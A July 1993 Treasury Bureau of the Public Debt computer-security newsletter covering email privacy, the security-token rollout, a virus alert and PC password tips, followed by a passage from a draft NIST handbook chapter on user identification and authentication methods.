The Information Systems Security Monitor Volume 3 Number 3

ÚÄÄÄÄÄÄ InformationÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³                          °°°Û   °°°°°Û  °°°°°Û   °°Û       °°Û     ³
ÃÄÄÄÄÄÄ Systems ÄÄÄÄÄÄÄÄÄÄÄ °Û ÄÄ °°°Û ÄÄ °°°Û ÄÄÄ °°°°Û ÄÄ °°°Û ÄÄÄÄ´
³                           °Û    °°°°°Û  °°°°°Û   °°°°°°°°°°°°Û     ³
ÃÄÄÄÄÄÄ Security ÄÄÄÄÄÄÄÄÄÄ °Û ÄÄÄÄÄ °°Û ÄÄÄ °°Û Ä °°Û Ä°°Û Ä°°Û ÄÄÄÄ´
³                          °°°Û   °°°°°Û  °°°°°Û   °°Û       °°Û     ³
ÀÄÄÄÄÄÄ Monitor ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Dedicated to the pursuit of security awareness..............

===========================================================================
Volume 3 Number 3                                                July 1993
===========================================================================

IN THIS ISSUE

WHO'S READING YOUR SCREEN

What's New?

Questions on Security Tokens

Clyde's Computer Security Hall of Fame

Virus Alert

Dear Clyde

Token Demo

Jim's Corner

Computer Speak

Computer Security Slogan Awardees (Insert)

The ISSM is a quarterly publication of the Department of Treasury, Bureau of the
Public Debt, AIS Security Branch, 200 3rd Street, Parkersburg, WV 26101  (304)
480-6355

Editors:   Ed Alesius
              Kim Clancy
              Mary Clark
              Jim Heikkinen
              Joe Kordella

*******************************
*                             *
*  WHO'S READING YOUR SCREEN  *
*    by Philip Elmer-Dewitt   *
*                             *
*******************************

It's a situation that arises a million times a day in offices around the world. 
An employee has something personal to tell a co-worker---a confidence, a joke, a
bit of gossip that might give offense if it were overheard.  Rather than pick up
the phone or wander down the hall, he or she simply types a message on a desktop
computer terminal and sends it as electronic mail.  The assumption is that
anything sent by E-mail is as private---if not more so---than a phone call or a
face-to-face meeting.

That assumption, unfortunately, is wrong. Although it is illegal in some states
for an employer to eavesdrop on private conversations or telephone calls---even
if they take place on a company-owned phone==there are no clear rules governing
electronic mail.  In fact, the question of how private E-mail should be has
emerged as one of the stickiest legal issues of the electronic age, one that seems
to evoke very different responses depending on whose electronic mail system is
being used and who is reading the E-mail.

Does the White House, for example have the right to destroy electronic messages
created in the course of running the government?  That issue came to a head last
week when a federal judge barred the BushAdministration from erasing computer
tapes containing E-mail dating back to the Reagan era---including electronic memos
that are relevant to Iran-contra and might implicate officials in the Iraqgate and
Clinton passport scandals.

The White House had issued guidelines that would have allowed staff members to
delete that mountain of electronic evidence.  Judge Charles Richey dismissed those
instructions as "capricious" and "contrary to the law."  He specifically rejected
the argument that all substantive E-mail had been saved in computer printouts. 
The paper versions, Richey noted, omit who received the documents and when.  "What
government officials knew and when they knew it has been a key question in not
only the Iran-contra investigation but also in the Watergate matter."

Many historians and legal experts applauded the decision.  Government officials,
they argue, are civil servants conducting the public's business; the public has
the right to review any documents they create--paper or electronic.  But how would
those citizens feel if it were their E-mail that was being preserved for
posterity?  Shoudn't private missives sent over a privately owned computer be
sacrosanct?

That's what Rhonda Hall and Bonita Bourke thought.  Three years ago, they were
hired by a California subsidiary of Nissan to set up and run the electronic mail
networkthat links the car company's Infiniti dealers.  A female supervisor heard
that some of their E-mail was getting pretty steamy and began monitoring the
messages.  She soon discovered that the two had some disparaging things to say
about her, and the women were threatened with dismissal.  When Hall and Bourke
filed a grievance complaining that their privacy had been violated, they were
fired.

One might think the two employees had a strong case for unlawful termination.  But
their case was dismissed.  Nissan's lawyers argued successfully that since the
company owned the computer system, its supervisors had a perfect right to read
anything created on it.  "I'm dismayed," says Noel Shipman, the attorney who is
handling Hall and Bourkes's appeal.  "To me, the simple bottom line is that
gentlemen don't read each other's mail."

But it's not that simple.  The Electronic Communications Privacy Act of 1986
prohibits "outside" interception of E-mail by a third party--the government, the
police or an individual--without proper authorization (such as a search warrant).
It does not, however, cover "inside" interception-seeking a peek at the office
gossip's E-mail, for example.  In the past, courts have ruled that interoffice
communications were considered private only if employees had a "reasonable
expectation" of privacy when they sent it. 

The fact is no absolute privacy exists in a computer system, even for the boss. 
System administrators need to have access to everything in a computer in order to
maintain it.  Moreover, every piece of E-mail leaves an electronic trail.  Though
Oliver North tried to delete all his electronic notes in order to conceal the
Iran-contra deal, copies of his secret memos ended up in the backup tapes made
every night by the White House system operators.  "The phrase 'reasonable
expectation of privacy' is a joke, because nobody reasonably expects any privacy
nowadays," says Michael Godwin, general counsel for the Electronic Frontier
Foundation, a not-for-profit group devoted to protecting the civil liberties of
people using electronic networks. 

Some computer users are taking matters into their own hands.  If the law will not
protect the privacy of their E-mail, they'll do it themselves--by scrambling their
messages with encryption codes.  Godwin's group is advocating that the government
let private individuals use the most powerful encryption systems--systems that
even the FBI can't crack. Unfortunately, such complex codes are likely to
undermine the principal virtue of electronic mail: convenience.  In the end,
people bent on private communication--or government officials involved in criminal
conspiracies--had best pick up the phone, or better yet, stroll down the hall and
have a good old-fashioned face-to-face conversation. 

Copyright 1993 TIME, Inc. 
Reprinted by permission.

            **********************END OF ARTICLE*********************

+++++++++++++++++++++++
+                     +
+    WHAT'S NEW?      + 
+                     +
+++++++++++++++++++++++

The AIS Security Branch's Electronic BBS number has changed.  Bureau telephone
changes at the Parkersburg location have been completed and the 420 prefix has
been replaced with a 480.  The new BBS number is (304) 480-6083. 

A new feature starts with this issue of the ISSM, titled "Jim's Corner".  This
article, written by Jim Heikkinen, will list Security Branch Training offerings;
various computer security Videos; CBTs; and publications available to Bureau
personnel through the AIS Security Branch.

                  ****************END OF ARTICLE***************

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%                                   %
%    QUESTIONS ON SECURITY TOKENS   % 
%         By Kim Reese              %
%                                   %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

In the last issue of the ISSM, an article was published describing security tokens
and Public Debt's plans to implement this technology in 1994.  As a result,
several questions about the tokens were received.  We felt that others may have
had the same questions and decided to publish them with their responses. 

     1)   What do the Tokens look like?
          The Tokens resemble a small pocket calculater.
     2)   How big are the Tokens?
          The Tokens are approximately 2 1/2" x 3 3/4" in its case.  The actual
          Token itself is the size of two credit cards stacked together.
     3)   Will I have to have the Token with me at all times?  I.E. carry it with
          my BPD I.D.
          No, you can secure your Token in your desk unless you are required to
          have dial-in access from home in order to perform your job function.
     4)   How many steps is this adding to my Logon?
          Approximately three steps plus Logon I.D. and mainframe password. The
          Security branch is looking at purchasing software that would allow you
          to log directly into the mainframe at the fifth step. 
     5)   Do I take the Token home with me?
          No, unless you require dial-in access from home.
     6)   What happens if I loose the Token?
          If your Token is lost notify your ISSM.  The ISSM will provide you with
          another Token and notify the other ISSMs and OAIS Security branch to be
          aware of the missing Token.
     7)   What happens if the Token breaks?
          If your Token breaks notify your ISSM. The ISSM will replace your Token
          with a new one and return the faulty Token to the OAIS Security branch
          to be returned to the contractor for repair or replacement.
     8)   What if I forget my PIN number?
          Contact your ISSM.  If you have not changed your PIN number the ISSM is
          able to determine the PIN number of your Token through the OAIS Security
          branch.  If you have changed your PIN number    the ISSM will replace
          your Token and provide the PIN number assigned to the new Token.
     9)   If I loose my Token and someone else finds it can they use my Token?
          No, The other person would need to know your PIN number in order to
          activate your Token.
     10)  Could someone borrow my Token to gain access if they cannot find their
          Token?
          No, the other person would need access to both your PIN number and your
          Logon I.D./Password.
     11)  Do the Tokens need to be LOCKED UP when we are not using them?
          Yes, the Tokens should be kept in a secured area. (i.e. locked in your
          desk)
     12)  Is the LOGON complicated using the Tokens?
          No, you will be provided short, concise step-by-step instructions on the
          process and one-on-one training.
     13)  Who do I contact if the Token is not functioning properly?
          You contact the Command Center, just as you do for other mainframe
          questions.
     14)  You mean I have to learn a new PIN number every time the battery goes
          dead on the Token?
          Yes, the contractor will probably do all maintenance of the Tokens
          including changing batteries.  We are not equipped or trained to
          properly maintain the Tokens, therefore this was included in the
          procurement contract.
     15)  Do the Tokens need to avoid severe temperature changes?
          Yes, this should not be a problem if the Token is left in your desk.
     16)  What kind of training will be provided on the Token use?
          Token training will be done on a one-on-one basis with each user by
          their ISSM until the user is comfortable with the Logon process.
     17)  When is the implementation date for the Tokens?
          Implementation for the Tokens is tentatively scheduled for March 1994.
     18)  To whom do I report a missing Token.
          Report missing Tokens to your ISSM who will notify OAIS Security branch
          of the missing Token.
     19)  Will we be financially responsible for a lost or broken Token?
          No, the procurement contract covers maintenance issues.

Please forward any additional questions to the OAIS Security Branch or a member
of the Token Committee.  The committee members are Kim Clancy, Dana Whited, Mary
Clark, Glenn Siber, Kim Reese and Sandra Woods.

                 ****************END OF ARTICLE*****************

XXXXXXXXXXXXXXXXXXXXXXXXXXX
X                         X
X         CLYDE'S         X
X    Computer Security    X
X      Hall of Fame       X
X                         X
XXXXXXXXXXXXXXXXXXXXXXXXXXX

Patrick Conner, ISSM for the Office of Administration, Division of Management
Services has been inducted to the Computer Security Hall of Fame.

Patrick Conner's dedication to his ISSM responsibilities are impressive.  Upon
Pat's assignment as an ISSM, his commitment to ensuring the success of the
Division of Management Services security program was evident.  Pat accepted his
new responsibilities with enthusiasm and was obviously concerned about "doing the
job right."  Pat has assisted in blazing new ground for the security program when
he educated application development teams in his area of their responsibilities
in regards to security.  Pat contacted the AIS Security Branch and requested a
meeting so that all members of the development team could be made aware of their
security responsibilities during development of the project.  This is an
impressive accomplishment for both Pat and Public Debt.  It ensures that
applications are installed with security in mind and aids Public Debt in enhancing
the integrity of its computing program. Pat's dedication to ensuring that the job
is done right the first time is a valuable one.  Thanks Pat for a job well done.

Submitted by Kim Clancy, Manager of the AIS Security Branch

                 ****************END OF ARTICLE*****************

{{{{{{{{{{{{{{{{{{{{{{{{{{
{                        {
{    VIRUS ALERT         {
{                        {
{{{{{{{{{{{{{{{{{{{{{{{{{{

The following information was received from the Office of Information Resources
Management...

This is to advise you that the Mint has encountered virus problems with PCs rented
by Price-Waterhouse Corporation for work being conducted at the bureau.  The Mint
ADP staff identified computer viruses in the equipment Price-Waterhouse brought
to the Mint.  To date, the Mint has found two viruses which have affected five of
the Price-Waterhouse PCs and 60% of their disks.  By taking immediate action, the
Mint was able to eradicate the viruses, save the Price-Waterhouse data, and
prevent the viruses from spreading to the Mint's own nationwide computer network.

Of particular concern to the Mint is the discovery that Price-Waterhouse
apparently has known that it has had virus problems in its own offices for
approximately 9 months.  Since Price-Waterhouse may be working with bureaus other
than the Mint, we are alerting you of this situation, and suggest that action be
taken as appropriate within your bureau to ensure that your systems are not
infected.

                 ****************END OF ARTICLE*****************

++++++++++++++++++++++++++
+     DEAR CLYDE         +
+                        + 
++++++++++++++++++++++++++

Responses to questions for those who are searching for the truth.

Dear Clyde,

I have information on my PC I want to protect.  Do you have any suggestions about
PC security techniques?
                              R. Concerned

Dear Concerned,

The easiest way to secure data on your PC is to install programs which will
require a password to gain access to your data.  For most PCs, a boot-up password
can be installed by running the set-up program for your PC.  Also, files can be
password protected within such applications as WordPerfect, Dbase and Lotus.  If
your PC does not have a password protection feature, there are programs such as
PW62.ZIP, SECURE.EXE, ENCRYPT.EXE, DECRYPT.EXE, and PASSWORD.EXE available from
the AIS Security Bulletin Board.

Another measure of security is to guard against destructive virus files being
loaded onto your PC.  There are virus detection programs available such as Central
Point, Commcrypt, F-Prot, and Vader to aid you in detection of such virus codes.

Always remember when leaving your area, if you activate software which will
require a password to be entered prior to your PC being able to be used, your data
will be secured.

If you need help installing any of these programs, your ISSM can help you.

Send your comments or questions to Clyde c/o the AIS Security Branch in
Parkersburg, Room 107F, or leave them in Clyde's mailbox located on the Security
bulletin boards throughout the Parkersburg office.

                 ****************END OF ARTICLE*****************
============================
=                          =
=         TOKEN DEMO       =
=        by Mary Clark     = 
=                          =
============================

A Security presentation was delivered by Kim Clancy, AIS Security Branch Manager,
to the Executive Board (E-Board) introducing the Computer Security Issues and
options facing Public Debt.  As a result, it was determined that Public Debt's
mainframe would be protected by the use of randomly generated passwords using a
DES compliant token device.  Such passwords change at each logon attempt and are
therefore considerably more secure than the "static passwords" that we now use.

Beginning in March, 1994, all Bureau of Public Debt mainframe users will be
required to use a token-generated password device.  

A token implementation team was organized, and an implementation plan was
developed that included the steps involved in the implementation of token controls
on the mainframe.  One of the tasks identified by the team to be completed before
implementation was user awareness of the tokens.

As part of the awareness plan, a token demonstration was set up at E-Street (Room
527), C-Street (Room 223), and Parkersburg (In the front hall under Security
branch's bulletin board, main building).  This simple demonstration is an
imitation of how the tokens will be utilized to improve the security of our
mainframe computer system.  It requires approximately five steps to gain access
to the mainframe.  These steps include: 

     1.   Entering a user name.
     2.   Entering a fixed password.
     3.   Entering a PIN number to activate the token.
     4.   Entering a password from the PC into the token.
     5.   Entering the token generated password into the PC to gain access.

Although the logon procedure will vary slightly with the mainframe software, this
demonstration gives a general idea of the steps involved with the token
technology.  Included with the demonstration is a handout listing questions and
answers on Security Tokens.  The handout answers the most frequently asked
questions about the security tokens. 

Any questions or comments regarding the demonstration should be directed to your
ISSM or one of the token team members.  The token team consists of:  Kim Clancy,
Mary Clark, Kim Reese, Glenn Siber, Dana Whited, and Sandy Woods.

                 ****************END OF ARTICLE*****************

!!!!!!!!!!!!!!!!!!!!!!!!!!!
!                         !
!      JIM'S CORNER       !
!    by Jim Heikkinen     !
!                         !
!!!!!!!!!!!!!!!!!!!!!!!!!!!

Starting with this issue I will offer training opportunities for anyone who
desires a security "tune-up". 

Initially, however, some background information is required to provide insight
into the Security Branch security awareness training mission.

The AIS Security Branch is mandated by the Computer Security Act of 1987, Public
Law 100-235, to provide "...mandatory periodic training in computer security
awareness and accepted computer practices of all employees who are involved with
the management, use, or operation of each federal computer system within or under
the supervision of..." the Bureau of Public Debt.

Further, the branch follows the guidelines and standards developed by the National
Institute of Standards and Technology (NIST) in providing this required training.
NIST Special Publication 500-172 may be considered the training "bible" in that
all employee categories, subject matter areas and training levels are provided for
in a matrix of training activities that satisfies the exigencies of P.L. 100-235. 
I'll expand each category and explain how each applies to our individual security
responsibilities in future issues of the newsletter. 

Also, samples of opportunities for refresher training and interesting audio-visual
materials will be offered.

Formal training to be announced:

     ACF2 - Washington (contract award is imminent)
     SNA/APPN/APPC - IBM Network Architectures
     Novell NetWare Security - Novell specific security issues

Publication:   (Available on request basis through the Parkersburg AIS Security
Branch.)

     "Computer Addiction?  A study of computer dependency" by Margaret A. Shotton 

               *******************END OF ARTICLE******************

################################################
#                                              #
#              COMPUTER SPEAK                  #
#    COMPUTER TERMS AND THEIR MEANINGS         #
#                                              #
################################################

DES (Data Encryption Standard) ... an encryption method approved as a standard by
the U.S. National Institute of Standards and Technology (NIST) and the American
National Standards Institue (ANSI) for encoding nonclassified sensitive digital
information.

eavesdrop ... Unauthorized interception of information.  Usuallly refers to
passive interception (receiving information), rather than active interception
(changing information.

encryption ... the transformation of original text (called plaintext) into
unintelligible text (called ciphertext).  Sometimes called "enciphering."

               ******************END OF ARTICLE******************

The AIS Security Branch Runs an Electronic BBS. Give us a call at (304) 480-6083.
An electronic version of the ISSM is posted on the board and can be downloaded.
Articles in the electronic version may include more detail in that we are not
limited by space constraints as we are in the paper copy. 

               ******************END OF ARTICLE******************


Downloaded From P-80 International Information Systems 304-744-2253

Draft of the NIST Computer Security Handbook on Identification and Authentification

* * * * * * * * * * * * *  NOTE * * * * * * * * * * * * * * * * *

This file is a DRAFT chapter intended to be part of the NIST
Computer Security Handbook.  The chapters were prepared by
different parties and, in some cases, have not been reviewed by
NIST.  The next iteration of a chapter could be SUBSTANTIALLY
different than the current version.  If you wish to provide
comments on the chapters, please email them to roback@ecf.ncsl.gov
or mail them to Ed Roback/Room B154, Bldg 225/NIST/Gaithersburg, MD 
20899.  

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

DRAFT          DRAFT          DRAFT          DRAFT          DRAFT

                IDENTIFICATION AND AUTHENTICATION

1    Introduction

     Information technology (IT) systems and the data they store
and process are valuable resources which need to be protected. 
One of the first steps toward securing an IT system is the
ability to verify the identity of its users.  The process of
verifying a user's identity is typically referred to as user
identification and authentication.  Passwords are the method used
most often for authenticating computer users, but this approach
has often proven inadequate in preventing unauthorized access to
computer resources when used as the sole means of authentication. 

     New technology is emerging that can significantly improve
the protection afforded by password-only authentication.  This
chapter will discuss the elements involved in authenticating
users as well as technological advances that can be used with or
instead of passwords to help ensure that only authorized users
can access an organization's IT resources.  

2    Overview

     Determining if a user is authorized to use an IT system
includes the distinct steps of identification and authentication. 
Identification concerns the manner in which a user provides his
unique identity to the IT system.  The identity may be a name
(e.g., first or last) or a number (e.g., account number).  The
identity must be unique so that the system can distinguish among
different users.  Depending on operational requirements, one
"identity" may actually describe one individual, more than one
individual, or one (or more) individuals only part of the time.  

     For example, an identity could be "system security officer,"
which could denote any of several individuals, but only when
those individuals are performing security officer duties and not
using the system as an ordinary user.  The identity should also
be non-forgible so that one person cannot impersonate another. 
Additional characteristics, such as the role a user is assuming
(for example, the role of database administrator), may also be
specified along with an identity. 

     Authentication is the process of associating an individual
with his unique identity, that is, the manner in which the
individual establishes the validity of his claimed identity. 
There are three basic authentication means by which an individual
may authenticate his identity.       

          a.   Something an individual KNOWS (e.g., a password,
Personal ID Number (PIN), the combination to a lock, a set of
facts from a person's background).

           b.   Something an individual POSSESSES (e.g., a token
or card, a physical key to a lock).       

          c.   Something an individual IS  (e.g., personal
characteristics or "biometrics" such as a fingerprint or voice
pattern).

      These basic methods may be employed individually, but many
user login systems employ various combinations of the basic
authentication methods.  An important distinction between
identification and authentication is that identities are public
whereas authentication information is kept secret and thus
becomes the means by which an individual proves that he actually
is who he claims to be.  In addition, identification and
authentication provides the basis for future access control.

3    Technical Approaches

     The use of passwords for authentication is widespread, and a
certain amount of expense and time is required to upgrade to more
sophisticated techniques.  In the near-term, one approach to
increasing the security of IT systems is to improve the use and
management of passwords, while exploring the use of alternate
technologies over time. 

3.1  Passwords

3.1.1 Security Considerations

     The security of a password scheme is dependent upon the
ability to keep passwords secret.  Therefore, a discussion of
increasing password security should begin with the task of
choosing a password.  A password should be chosen such that it is
easy to remember, yet difficult to guess.  There are a few
approaches to guessing passwords which we will discuss, along
with methods of countering these attacks.

     Most operating systems, as well as large applications such
as Database Management Systems, are shipped with administrative
accounts that have preset passwords.  Because these passwords are
standard, outside attackers have used them to break into IT
systems.  It is a simple, but important, measure to change the
passwords on administrative accounts as soon as an IT system is
received.

     A second approach to discovering passwords is to guess them,
based on information about the individual who created the
password.  Using such information as the name of the individual,
spouse, pet or street address or other information such as a
birth date or birthplace can frequently yield an individual's
password.  Users should be cautioned against using information
that is easily associated with them for a password.

     There are several brute force attacks on passwords that
involve either the use of an on-line dictionary or an exhaustive
attempt at different character combinations.  There are several
tactics that may be used to prevent a dictionary attack.  They
include deliberately misspelling words, combining two or more
words together, or including numbers and punctuation in a
password.  Ensuring that passwords meet a minimum length
requirement also helps make them less susceptible to brute force
attacks.

     To assist users in choosing passwords that are unlikely to
be guessed, some operating systems provide randomly generated
passwords.  While these passwords are often described as
pronounceable, they are frequently difficult to remember,
especially if a user has more than one of them, and so are prone
to being written down.  In general, it is better for users to
choose their own passwords, but with the considerations outlined
above in mind.  

3.1.2  Management Issues

      Password length and the frequency with which passwords are
changed in an organization should be defined by the
organization's security policy and procedures and implemented by
the organization's IT system administrator(s).  The frequency
with which passwords should be changed should depend on the
sensitivity of the data.  Periodic changing of passwords can
prevent the damage done by stolen passwords, and make "brute
force" attempts to break into system more difficult.  Too
frequent changes, however, can be irritating to users and can
lead to security breaches such as users writing down passwords or
using too-obvious passwords in an attempt to keep track of a
large number of changing passwords.  This is inevitable when
users have access to a large number of machines.  Security policy
and procedures should strive for consistent, livable rules across
an organization.

     Some mainframe operating systems and many PC applications
use passwords as a means of access control, not just
authentication.  Instead of using mechanisms such as access
control lists (ACLs), access is granted by entering a password. 
The result is a proliferation of passwords that can significantly
reduce the overall security of an IT system.  While the use of
passwords as a means of access control is common, it is an
approach that is less than optimal and not cost-effective.

3.2  Memory Card

      There is a very wide variety of memory card systems with
applications for user identification and authentication.  Such
systems authenticate a user's identity based on a unique card,
i.e., something the user possesses, sometimes in conjunction with
a PIN (Personal Identification Number), i.e., something a user
knows.  The use of a physical object or token, in this case a
card, has prompted memory card systems to be referred to as token
systems.  Other examples of token systems are optical storage
cards and integrated circuit (IC) keys.

     Memory cards store, but do not process, information. 
Special reader/writer devices control the writing and reading of
data to and from the cards.  The most common type of memory card
is a magnetic stripe card.  These cards use a film of magnetic
material, similar or identical to audio and computer magnetic
tape and disk equipment, in which a thin strip, or stripe, of
magnetic material affixed to the surface of a card.  A magnetic
stripe card is inexpensive, easy to produce and has a high
storage capacity. 

     The most common forms of a memory card are the telephone
calling card, credit card, and ATM card.  The number on a
telephone calling card serves as both identification and
authentication for the user of a long distance carrier and so
must remain secret.  The card can be used directly in phones that
read cards or the number may be entered manually in a touch tone
phone or verbally to an operator.  Possession of the card or
knowledge of the number is sufficient to authenticate the user.

     Possession of a credit card, specifically the card holder's
name, card number and expiration date, is sufficient for both
identification and authentication for purchases made over the
telephone.  The inclusion of a signature and occasionally a
photograph provide additional security when the card is used for
purchases made in person.

     The ATM card employs a more sophisticated use of a memory
card, involving not only something the user possesses, namely the
card, but also something the user knows, viz. the PIN.  A lost or
stolen card is not sufficient to gain access; the PIN is required
as well.  This paradigm of use seems best suited to IT
authentication applications.

     While there are some sophisticated technical attacks that
can be made against memory cards, they can provide a marked
increase in security over password-only systems.  It is important
that users be cautioned against writing their PIN on the card
itself or there will be no increase in security over a simple
password system.  

       Memory cards can and are widely used to perform
authentication of users in a variety of circumstances from
banking to physical access.  It is important that the
considerations mentioned above for password selection are
followed for PIN selection and that the PIN is never carried with
the card to gain the most from this hybrid authentication system.

3.3  Smart Card

      A smart card is a device typically the size and shape of a
credit card and contains one or more integrated chips that
perform the functions of a computer with a microprocessor,
memory, and input/output.  Smart cards may be used to provide
increased functionality as well as an increased level of security
over memory cards when used for identification and
authentication.

      A smart card can process, as well as store, data through
its microprocessor; therefore, the smart card itself (as opposed
to the reader/writer device), can control access to the
information stored on the card.  This can be especially useful
for applications such as user authentication in which security of
the information must be maintained.  The smart card can actually
perform the password or PIN comparisons inside the card.  

      As an authentication method, the smart card is something
the user possesses.  With recent advances, a password or PIN
(something a user knows) can be added for additional security and
a fingerprint or photo (something the user is) for even further
security.  As contrasted with memory cards, an important and
useful feature of a smart card is that it can be manufactured to
ensure the security of its own memory, thus reducing the risk of
lost or stolen cards.  

     The smart card can replace conventional password security
with something better, a PIN, which is verified by the card
versus the computer system, which may not have as sophisticated a
means for user identification and authentication.  The card can
be programmed to limit the number of login attempts as well as
ask biographic questions, or make a biometric check to ensure
that only the smart card's owner can use it.  In addition, non-
repeating challenges can be used to foil a scenario in which an
attacker tries to login using a password or PIN he observed from
a previous login.  In addition, the complexities of smart card
manufacturing makes forgery of the card's contents virtually
impossible.  

     Use of smart devices means the added expense of the card
itself, as well as the special reader devices.  Careful decisions
as to what systems warrant the use of a smart card must be made. 
The cost of manufacturing smart cards is higher than that of
memory cards but the disparity will get less and less as more and
more manufacturers switch to this technology.  On the other hand,
it should be remembered that smart cards, as opposed to memory
only cards, can effectively communicate with relatively 'dumb',
inexpensive reader devices.  

     The proper management and administration of smart cards will
be a more difficult task than with typical password
administration.  It is extremely important that responsibilities
and procedures for smart card administration be carefully
implemented.  Smart card issuance can be easily achieved in a
distributed fashion, which is well suited to a large
organizational environment.  However, just as with password
systems, care should be taken to implement consistent procedures
across all involved systems.

3.4  Hand-Held Password Generators

     Hand-held password generators are a state-of-the-art type
of smart token.  They provide a hybrid authentication, using both
something a user possesses (i.e., the device itself) and
something a user knows (e.g., a 4 to 8 digit PIN).  The device is
the size of a shirt-pocket calculator, and does not require a
special reader/writer device.  One of the main forms of password
generators is a challenge-response calculator.

     When using a challenge-response calculator, a user first
types his user name into the IT system.  The system then presents
a random challenge, for example, in the form of a 7-digit number. 
The user is required to type his PIN into the calculator and then
enter the challenge generated by the IT system into the
calculator.  The generator then provides a corresponding
response, which he then types into the IT system.  If the
response is valid, the login is permitted and the user is granted
access to the system.

     When a password generator is used for access to a computer
system in place of the traditional user name and password
combination, an extra level of security is gained.  With the
challenge response calculator, each user is given a device that
has been uniquely keyed; he cannot use someone else's device for
access.  The host system must have a process or a processor to
generate a challenge response pair for each login attempt, based
on the initially supplied user name.  Each challenge is
different, so observing a successful challenge-response exchange
gives no information for a subsequent login.  Of course, with
this system the user must memorize a PIN. 

      The hand-held password generator can be a low-cost addition
to security, but the process is slightly complicated for the
user.  He must type two separate entries into the calculator, and
then correctly read the response and type it into the computer. 
This process increases the chance for making a mistake.  

      Overall, this technology can be a useful addition to
security, but users may find some inconvenience.  Management, if
they decide to use this approach, will have to establish a plan
for integrating the technology into their IT systems.  There will
also be the administrative challenge for keying and issuing the
cards, and keeping the user database up-to-date. 

3.5  Biometrics

      Biometric authentication systems employ unique physical
characteristics (or attributes) of an individual person in order
to authenticate the person's identity.  Physical attributes
employed in biometric authentication systems include
fingerprints, hand geometry, hand-written signatures, retina
patterns and voice patterns.  Biometric authentication systems
based upon these physical attributes have been developed for
computer login applications.  

      Biometric authentication systems generally operate in the
following manner:      

Prior to any authentication attempts, a user is "enrolled" by
creating a reference profile (or template) based on the desired
physical attribute.  The reference profile is usually based on
the combination of several measurements.  The resulting template
is associated with the identity of the user and stored for later
use.

When attempting to authenticate themselves, the user enters his
login name or, alternatively, the user may provide a card/token
containing identification information.  

The user's physical attribute is then measured.

The previously stored reference profile of the physical attribute
is then compared with the measured profile of the attribute taken
from the user.  The result of the comparison is then used to
either accept or reject the user.

     Biometric systems can provide an increased level of security
for IT systems, but the technology is still less mature than
memory or smart cards.  Imperfections in biometric authentication
devices arise from technical difficulties in measuring and
profiling physical attributes as well as from the somewhat
variable nature of physical attributes.  Many physical attributes
change depending on various conditions.  For example, a person's
speech pattern may change under stressful conditions or when
suffering from a sore throat or cold.

Biometric systems are typically used in conjunction with other
authentication means in environments requiring high security.

3.6  Cryptography

    Cryptography can play many different roles in user
authentication.  Cryptographic authentication systems provide
authentication capabilities through the use of cryptographic keys
known or possessed only by authorized entities.  Cryptography
also supports authentication through its widespread use in other
authentication systems.  For example, password systems often
employ cryptography to encrypt stored password files, card/token
system often employ cryptography to protect sensitive stored
information, and hand-held password generators often employ
cryptography to generate random, dynamic passwords.  Cryptography
is frequently used in distributed applications to convey
identification and authentication information from one system to
another over a network.

       Cryptographic authentication systems authenticate a user
based on the knowledge or possession of a cryptographic key. 
Cryptographic authentication systems can be based on either
private key cryptosystems or public key cryptosystems.  

     Private key cryptosystems use the same key for the functions
of both encryption and decryption.  Cryptographic authentication
systems based upon private key cryptosystems rely upon a shared
key between the user attempting access and the authentication
system.  

     Public key cryptosystems separate the functions of
encryption and decryption, typically using a separate key to
control each function.  Cryptographic authentication systems
based upon public key cryptosystems rely upon a key known only to
the user attempting access.  

4  Issues

     In addition to the actual choice of identification and
authentication technology, there are a number of other issues
that should be addressed to ensure the overall success and
security of one's IT system.  

4.1  Networks and Applications

     With the increased use of networks connecting multiple
hosts, an average IT user may find himself logging onto several
different computers, some of them remotely through a network. 
This situation poses a number of options with respect to user
identification and authentication.  In one option, the user must
authenticate himself to each computer separately, with a possibly
different password each time.  If there is a different password
for each computer, then that user will have difficulty in
remembering them.  If one password is used for all systems, then
the compromise of the password will have more far reaching
effects.

     A more desirable situation is one in which the user need
only authenticate himself to the first computer he logs into and
that computer passes the authentication data to each of the other
computers the user then needs to access.  This scheme requires
that all of the computers on the network are capable of reliably
handling this authentication data.  Standardization efforts such
as Open System Environment (OSE), Portable Operating System
Interface (POSIX) and Government Open Systems Interconnection
Profile (GOSIP) can contribute to this goal of transparent
authentication across networks.

     Related to the issue of user authentication across different
platforms is the issue of user authentication across different
applications on the same platform.  Large applications, such as
database management systems (DBMS), frequently require that users
login to them as well as to the underlying operating system. 
This second application login is considered an unnecessary burden
by many users.  As discussed in the network context above, if
authentication data can be reliably shared between an operating
system and the applications running on it, then the task of
authenticating a user to a complex IT system becomes simpler. 

4.2  Procurement Considerations

     An organization must answer numerous questions when it
decides to implement an advanced authentication system.  The
following discussion highlights many of the issues involved in
evaluating, procuring, and integrating these systems.

4.2.1  Sources of information 

     A variety of sources should be used when evaluating
authentication systems.  Vendor product literature can be very
helpful in describing specific details of product operation,
and in understanding the range of products offered.  There are
several annual conferences devoted to computer security, network
access control, and authentication technology.  In addition to
the papers presented at these conferences, there are usually
large vendor exhibit halls   and product forums.  Many
organizations, particularly those in the government sector, have
published information on the selection and integration of
advanced authentication technology.  These publications are
often the result of practical experience gained during the
implementation of these systems, and so can be particularly
useful.

4.2.2  Accuracy 

     The accuracy of an authentication system refers to the
ability of that system to correctly identify authorized system
users while rejecting unauthorized users.  Since this is the  
primary function of an authentication system, accuracy is
directly related to the level of security provided by the
system.  Vendors may not be objective about producing an
interpreting the results of tests which quantify the accuracy
of the authentication process with regard to the vendor's  
particular products.  For these reasons, an organization may wish
to run independent tests to determine the accuracy of an
authentication system in terms which are relevant to the
environment in which the system will be used.

4.2.3  Reliability 

     An authentication system should be capable of operating in
its intended environment for a reasonable period of time.  During
this time, the system is expected to perform at or above a level
which ensures an appropriate amount of protection for the host
system.  If the authentication system fails, the chances for
unauthorized access during the failure should be minimized.  

4.2.4  Maintainability 

     All hardware and software systems require some form of
maintenance.  The components of an authentication system should
be evaluated to determine the level of maintenance which the
